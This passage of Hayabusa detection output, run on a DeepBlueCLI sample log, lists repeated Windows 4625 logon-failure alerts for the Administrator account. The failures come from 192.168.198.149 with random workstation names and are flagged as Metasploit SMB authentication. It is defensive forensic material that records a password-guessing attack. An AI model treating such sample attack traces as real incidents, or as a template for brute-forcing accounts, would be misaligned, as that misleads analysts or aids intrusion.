Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
